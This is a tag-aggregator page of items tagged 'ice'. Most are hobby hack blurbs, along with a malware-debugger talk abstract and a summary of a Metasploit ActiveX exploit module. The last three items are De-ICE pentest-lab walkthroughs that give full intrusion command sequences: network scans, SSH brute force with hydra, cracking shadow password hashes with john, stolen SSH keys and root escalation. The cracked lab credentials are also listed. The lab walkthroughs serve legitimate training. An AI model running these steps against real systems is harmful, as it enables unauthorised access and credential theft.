«
Expand/Collapse
28 items tagged "ice"
Related tags:
black [+],
black ice [+],
windows management instrumentation [+],
vulnerability [+],
root [+],
ocx [+],
nbsp [+],
instrumentation service [+],
heorot [+],
code execution [+],
attackers [+],
arbitrary files [+],
activex [+],
Howto [+],
BackTrack [+],
sql injection [+],
joomla [+],
freeze [+],
exploits [+],
day [+],
component [+],
cnc [+],
clock [+],
chemistry [+],
ziggy marley [+],
zamboni [+],
writeup [+],
white meat [+],
wax [+],
vulnerability identification [+],
video streams [+],
video [+],
vfd [+],
use [+],
usa [+],
turkey [+],
tube [+],
tool [+],
time [+],
ssl certs [+],
shout out louds [+],
shocking [+],
set [+],
security [+],
root id [+],
rob [+],
rmc [+],
rink [+],
rig [+],
repair [+],
remote [+],
record [+],
quynh nguyen [+],
ploy [+],
orbiting satellites [+],
o connor [+],
nmea [+],
nguyen anh [+],
mouths [+],
motor [+],
molds [+],
milling [+],
metal laser [+],
metal [+],
malware [+],
maker [+],
libations [+],
lead acid battery [+],
launchpad [+],
krasnow [+],
kate [+],
justin [+],
insecure method [+],
innovation [+],
gps [+],
fishing [+],
fisherman [+],
excitement [+],
ebay [+],
dry oven [+],
dry ice [+],
diy [+],
direct metal laser sintering [+],
digital [+],
deep fried turkey [+],
deep freeze [+],
debugger [+],
dave [+],
d print [+],
current architecture [+],
culmination [+],
cream [+],
craft [+],
cover [+],
cooking [+],
content originator [+],
conductive containers [+],
cocktail party [+],
cellphones [+],
cd tools [+],
cat shadow [+],
cat group [+],
caddy [+],
brian mccarthy [+],
brendan oconnor [+],
ben krasnow [+],
beer [+],
back yard [+],
automatic ice maker [+],
audio [+],
astronaut ice cream [+],
andreas [+],
hacks [+]
-
-
13:00
»
Hack a Day
This delightful marketing ploy requires the listener to fabricate their own record out of ice. The band Shout Out Louds wanted to make a splash with their newest single. So they figured out how to make a playable record out of ice. The main problem with this is the grooves start to degrade immediately when [...]
-
-
11:01
»
Hack a Day
There are a number of things that can go wrong with an automatic ice maker. But one of the more common problems is that the motor which scoops the ice out of the integrated trays can burn out after years of use. [Dave] recently repaired a common ice maker motor and shows us how cheap [...]
-
-
11:01
»
Hack a Day
We’ve known people to put down a small ice rink in their back yard during the winter. But a machine to resurface these diy rinks is unheard of until now. The big name in rink resurfacing is Zamboni, the person who invented this method of keeping the ice pristine. This has almost everything you would find on [...]
-
-
5:00
»
Hack a Day
Because Nixies, Decatrons, and VFD tubes really are that cool, [cubeberg] over on the 43oh forums designed an IV-18 clock for the TI Launchpad. Like adafruit’s Ice Tube clock, [cubeberg]‘s project uses a surplus Russian IV-18 VFD tube conveniently sourced on eBay. On the board, there are three buttons for changing the time and setting the alarm along [...]
-
-
6:02
»
Hack a Day
Now you can experience the excitement felt for centuries by ice fisherman thanks to this cellular-capable tip-up. For the uninitiated a little ice fishing primer may be in order. The majority of what you see above is a standard tip-up rig for ice fishing. Basically it lets you set many baited lines and just watch [...]
-
-
16:05
»
Hack a Day
Looks like ice-cube trays are once again proving their versatility as this one is serving as the vessel for a home made lead-acid battery. With a collection of uniformly sized non-conductive containers, it makes the perfect base for a set of small cells. This project is the culmination of a Hackerspace class about batteries, and [...]
-
-
7:01
»
Hack a Day
What does dry ice, ethonal, wax beads, and a blender have in common? It was the first attempts at making media for this wax 3D printer that [Andreas] has been building up. Wanting to produce 3D printed objects out of metal, and finding that direct metal laser sintering machines were still out of reach of [...]
-
-
7:58
»
Hack a Day
In our younger and more vulnerable years nothing was greater than visiting a museum, going to the gift shop, and badgering our parents to buy a pack of astronaut ice cream. Freeze dried ice cream leaves a taste of nostalgic chalky sweetness in our mouths, so we’re very excited to see that [Ben Krasnow] is now making [...]
-
-
6:20
»
Hack a Day
Want some fancy ice for your next cocktail party? You can try to find spherical ice-cube trays but you won’t get the kind of results seen here. It turns out the trick to this isn’t how you freeze the water, it’s how you melt the ice. [Brendan O'Connor] started this project after seeing an ice [...]
-
-
6:28
»
Hack a Day
Turkey day is fast approaching and for those of us not cool enough to be rocking the deep-fried turkey this year we’ll have to suffer though a potentially dry oven-roasted bird. Chef [Justin] came up with a great way to prevent dried out white meat on a turkey using ice of all things. The enemy [...]
-
-
2:57
»
SecDocs
Authors:
Kuniyasu Suzaki Quynh Nguyen Anh Tags:
malware debugger malware analysis Event:
Black Hat USA 2010 Abstract: Dynamic malware analysis is an important method to analyze malware. The most important tool for dynamic malware analysis is debugger. However, because debuggers are originally built by software developers to debug legitimate software, they have some significant flaws against malware. First of all, malware can easily detect the presence of debugger with various tricks. Another fundamental problem is that because malware run in the same security domain with debugger, they can potentially tamper with the debugger, and prevent it from functioning correctly. Unfortunately, all of the above drawbacks are unfixable in the current architecture. This research presents a new debugger named Virt-ICE, which is designed to address the problems of current malware debuggers. Using virtualization technology, Virt-ICE is totally invisible to malware, thus renders most available anti-debugging techniques useless. Thanks to the isolation provided by virtual machine, Virt-ICE is out of the reach of malware, and cannot be tampered with. Another advantage of Virt-ICE is that unlike many other popular debuggers, it can deal with ring-0 code, therefore it has no issue handling kernel rootkits. Virt-ICE also offers a novel event-based method to intercept malware execution, which can help to improve the debugging efficiency. Finally, Virt-ICE includes some built-in automatic malware analysis facilities to give the analysts more information on malware, so they can reduce the time on the job by focusing their debugging efforts on important points. We conclude the talk with some live demos to show how Virt-ICE can debug some real malware.
-
-
12:25
»
Packet Storm Security Exploits
This Metasploit module allows remote attackers to place arbitrary files on a users file system by abusing the "DownloadImageFileURL" method in the Black Ice BIImgFrm.ocx ActiveX Control (BIImgFrm.ocx 12.0.0.0). Code execution can be achieved by first uploading the payload to the remote machine, and then upload another mof file, which enables Windows Management Instrumentation service to execute the binary. Please note that this module currently only works for Windows before Vista. Also, a similar issue is reported in BIDIB.ocx (10.9.3.0) within the Barcode SDK.
-
12:25
»
Packet Storm Security Recent Files
This Metasploit module allows remote attackers to place arbitrary files on a users file system by abusing the "DownloadImageFileURL" method in the Black Ice BIImgFrm.ocx ActiveX Control (BIImgFrm.ocx 12.0.0.0). Code execution can be achieved by first uploading the payload to the remote machine, and then upload another mof file, which enables Windows Management Instrumentation service to execute the binary. Please note that this module currently only works for Windows before Vista. Also, a similar issue is reported in BIDIB.ocx (10.9.3.0) within the Barcode SDK.
-
12:25
»
Packet Storm Security Misc. Files
This Metasploit module allows remote attackers to place arbitrary files on a users file system by abusing the "DownloadImageFileURL" method in the Black Ice BIImgFrm.ocx ActiveX Control (BIImgFrm.ocx 12.0.0.0). Code execution can be achieved by first uploading the payload to the remote machine, and then upload another mof file, which enables Windows Management Instrumentation service to execute the binary. Please note that this module currently only works for Windows before Vista. Also, a similar issue is reported in BIDIB.ocx (10.9.3.0) within the Barcode SDK.
-
1:30
»
Packet Storm Security Exploits
This Metasploit module allows remote attackers to place arbitrary files on a users file system by abusing the "DownloadImageFileURL" method in the Black Ice BIImgFrm.ocx ActiveX Control (BIImgFrm.ocx 12.0.0.0).
-
1:30
»
Packet Storm Security Recent Files
This Metasploit module allows remote attackers to place arbitrary files on a users file system by abusing the "DownloadImageFileURL" method in the Black Ice BIImgFrm.ocx ActiveX Control (BIImgFrm.ocx 12.0.0.0).
-
1:30
»
Packet Storm Security Misc. Files
This Metasploit module allows remote attackers to place arbitrary files on a users file system by abusing the "DownloadImageFileURL" method in the Black Ice BIImgFrm.ocx ActiveX Control (BIImgFrm.ocx 12.0.0.0).
-
-
5:03
»
Hack a Day
If you’re rebroadcasting copyrighted video streams how will the authorities ever track you down? Well it looks like you don’t even need to be the content originator, and they’ll track you down because you didn’t really cover your tracks in the first place. [Brian McCarthy] found this out the hard way when his domain name [...]
-
-
6:26
»
Hack a Day
[Rob] has made an astounding contribution in the effort to keep our libations chilled. Not content with merely refrigerating his cold ones, or even putting them in a cooler full of ice, he has built a beer caddy out of solid ice. Though it may look simple initially, you can see from his writeup that [...]
-
-
6:15
»
Hack a Day
Our favorite Soviet-Era display that found its way into a present-day kit now displays time from orbiting satellites. A GPS module patched into an Ice Tube Clock with modified firmware will be able to provide a satellite-synced time. The firmware, modified by yours truly, parses the GPS module’s NMEA RMC sentences for the time and [...]
-
-
13:15
»
remote-exploit & backtrack
Links
Watch video on-line: De-ICE v2.0 (1.100)
Download video: g0tmi1k - De-ICE v2.0 (1.100) [HD].mp4 - de-ice,g0tmi1k
Commands:
Bash pastebin - collaborative debugging tool
What is this?
This is my walk though of how I broke into the De-ICE.net network, level 2, disk 1.
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.
What do I need?
> BackTrack 4 (Final)
> de-ice.net-2.100-1.1.iso (MD5: 09798f85bf54a666fbab947300f38163)
> Dictionary(s)
Software
Name:
De-ICE.net
Version: 2.0
(Level 1 - Disk 2 - IP Address: 1.100)
Home Page:
http://www.de-ice.net or
Heorot.net » De-ICE PenTest LiveCDs Project
Download Link:
Forums/Support:
http://forums.heorot.net and
Heorot.net • Login
WiKi/Support:
De-ICE.net PenTest Disks - Hackerpedia
Commands:
Code:
nmap -n 192.168.2.1-255
nmap -n -sV -sS -O 192.168.2.100
nmap -n -sV -sS -O 192.168.2.101
firefox 192.168.2.100
[+]kate -> list of possible usernames. Save. Filename: usernames.txt
firefox 192.168.2.101
[+]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (+ root, admin) with '~' infront. -> http://192.168.2.101 -> 80
firefox http://192.168.2.101/~pirrip
[+]kate -> Update usernames with the ones which we got a respond from. Save.
[+]BackTrck -> Web Application Analysis -> Web (frontend) -> nikto2
./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124
firefox http://192.168.2.101/~pirrip/.ssh
// Save both files
mv /root/id_rsa /http://root/.ssh/id_rsa
mv /root/id_rsa.pub /http://root/.ssh/id_rsa.pub
chmod 000 /http://root/.ssh/id_rsa
chmod 000 /http://root/.ssh/id_rsa.pub
ssh pirrip@192.168.2.100
// Yes
mailx
// 3 - we see that havisham passowrd is 'changeme'. 7 - we seen pirrip password is '0l1v3rTw1st'
cd /etc/
vi passwd
// kate -> Update usernames with only valid ones.
vi group
sudo vi shadow
// edit (D, :22,22y, :put, i, root, ESCape, ESCape, d + [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st
su
// Password: 0l1v3rTw1st
cd /root/
ls -a
cd .save/
ls -a
chmod -R 777 /root/
//In BackTrack//
scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/
unzip great_expectations.zip
tar xf great_expectations.tar
strings Jan08
//In SSH//
sudo iv /var/mail/havisham
modprobe capability
//In BackTrack//
ftp 192.168.2.100
// Usrename: pirri. Password: 0l1v3rTw1st //
ls -a
//In SSH//
exit
//In BackTrack//
[+]Firefox -> Send a REAL email to: philip.pirrip.ge@gmail.com
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:P1ckw1ckP@p3rs root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
havisham:changeme havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
pirrip:0l1v3rTw1st pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch: magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
----------------------------------------------------------------------------------------------------
Notes:
Video length: 09:07
Capture length: 30:35
Song: Ashley Wallbridge - Masquerade (Original Mix)
Blog Post:
g0tmi1k: [Video] De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}
Forum Post:
~g0tmi1k
-
13:13
»
remote-exploit & backtrack
Links
Watch video on-line: De-ICE v1.1 (1.00)
Download video: g0tmi1k - De-ICE v1.1 (1.100) [HD].mp4 - de-ice,g0tmi1k
Commands:
Bash pastebin - collaborative debugging tool
What is this?
This is my walk though of how I broke into the De-ICE.net network, level 1, disk 2.
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.
What do I need?
> BackTrack 4 (Final)
> de-ice.net-1.110-1.1.iso (MD5: a3341316ca9860b3a0acb06bdc58bbc1)
> Dictionary(s)
Software
Name:
De-ICE.net
Version: 1.1
(Level 1 - Disk 2 - IP Address: 1.100)
Home Page:
http://www.de-ice.net or
Heorot.net » De-ICE PenTest LiveCDs Project
Download Link:
Forums/Support:
http://forums.heorot.net and
Heorot.net • Login
WiKi/Support:
De-ICE.net PenTest Disks - Hackerpedia
Commands:
Code:
nmap -n 192.168.1.1-255
nmap -n -sS -sV -O 192.168.1.100
firefox 192.168.1.100
[+]kate -> make list of possible usernames. Save. Filename: usernames
// lastF, fLast
hydra 192.168.1.100 ssh2 -L /root/usernames -p password -e s
ssh bbanter@192.168.1.100
// "Yes" if quiz about trusting authenticity. Password: bbanter
cd /etc/
cat passwd
[+]kate -> Update usernames. Save.
cat group
exit
cd /root/tools/dictionary/
cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords
hydra 192.168.1.100 ssh2 -V -l aadams -P /root/passwords
ssh aadams@192.168.1.100
// Password: nostradamus
cd /etc/
sudo cat shadow
// Password: nostradamus
[+]kate -> New -> Paste -> Save. Filename: shadow
exit
john
./john --rules --wordlist=/root/passwords --users=root /root/shadow
// Password: tarot
ssh aadams@192.168.1.100
// Password: nostradamus
su
// Password: tarot
ls -a
cd ..
ls -a
cd ftp
/
ls -a
cd incoming/
ls -a
openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot
cd /etc/
vi vsftpd.conf
// edit (by pressing i) vsftpd.conf to have a '#' in front of 'listen=YES' (last line). Then save it (:w), and exit (:quit)
modprobe capability
exit
exit
ftp 192.168.1.100
// User: root. Password: tarot
ls -a
cd ..
ls -a
cd home
ls -a
cd ftp
ls -a
cd incoming
ls -a
get salary.csv
cd /pentest/passwords/jtr
ls
mv salary.csv ~
[+]kate -> salary.csv
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:tarot = root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
aadams:nostradamus = aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:bbanter = bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:hierophant = ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
----------------------------------------------------------------------------------------------------
Notes:
Video length: 04:11
Capture length: 08:52
Song: Eryka Badu & Ziggy Marley - I Luv U (Dubstep Mix)
Blog Post:
g0tmi1k: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
Forum Post:
~g0tmi1k
-
13:08
»
remote-exploit & backtrack
Links
Watch video on-line: De-ICE v1.0 (1.110)
Download video: g0tmi1k - De-ICE v1.0 (1.110) [HD].mp4 - de-ice,g0tmi1k
Commands:
Bash pastebin - collaborative debugging tool
What is this?
This is my walk though of how I broke into the De-ICE.net network, level 1, disk 1.
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.
What do I need?
> BackTrack 4 (Final)
> de-ice.net-1.110-1.0.iso (MD5: a626d884148c63bfc9df36f2743d7242)
> Dictionary(s)
Software
Name:
De-ICE.net
Version: 1.0
(Level 1 - Disk 1 - IP Address: 1.110)
Home Page:
http://www.de-ice.net or
Heorot.net » De-ICE PenTest LiveCDs Project
Download Link:
Forums/Support:
http://forums.heorot.net and
Heorot.net • Login
WiKi/Support:
De-ICE.net PenTest Disks - Hackerpedia
Commands:
Code:
nmap -n 192.168.1.1-255
nmap -n -sS -sV -O 192.168.1.110
firefox 192.168.1.110
[+]kate -> make list of possible usernames
// lastF, fLast
ftp 192.168.1.110
// Username: anonymous. Password: [Blank]
ls -a
cd download
ls -a
cd etc
ls -a
get core
exit
strings core
[+]Copy from 'root:$...' to '[EOF]'. Kate -> New -> Paste. Format so each username is one its own line -> Save. Filename: shadow
cd tools/dictionary/
cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords
john
./john --rules --wordlist=/root/passwords /root/shadow
//Password: root:Complexity & ccofee:Diatomaceous
ssh ccofee@192.168.1.110
//Password: Diatomaceous
ls -a
cd ..
ls -a
cd root/
ls -a
cd .save/
su
//Password: Complexity
cd .save/
ls -a
cat copy.sh
openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw
ls -a
cat customer_account.csv
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:Complexity = root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams: = aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:99999:7:::
bbanter:Zymurgy = bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0:99999:7:::
ccoffee:Diatomaceous = ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
----------------------------------------------------------------------------------------------------
Notes:
Video length: 06:57
Capture length: 18:17
Song: Aly & Fila - Khepera
Blog Post:
g0tmi1k: [Video] De-ICE.net v1.0 (1.110) {Level 1 - Disk 1}
Forum Post:
~g0tmi1k
0day.today (was: 1337day, Inj3ct0r, 1337db)
OSVDB Vulnerabilities
Exploit-DB
SecurityFocus Vulnerabilities
Bugtraq
XSSed
Sophos security news
Penetration Testing
SecuriTeam
BackTrack Linux Forums
Threatpost
carnal0wnage.attackresearch.com
Carnal0wnage
Darknet
The Exploitant
Wirevolution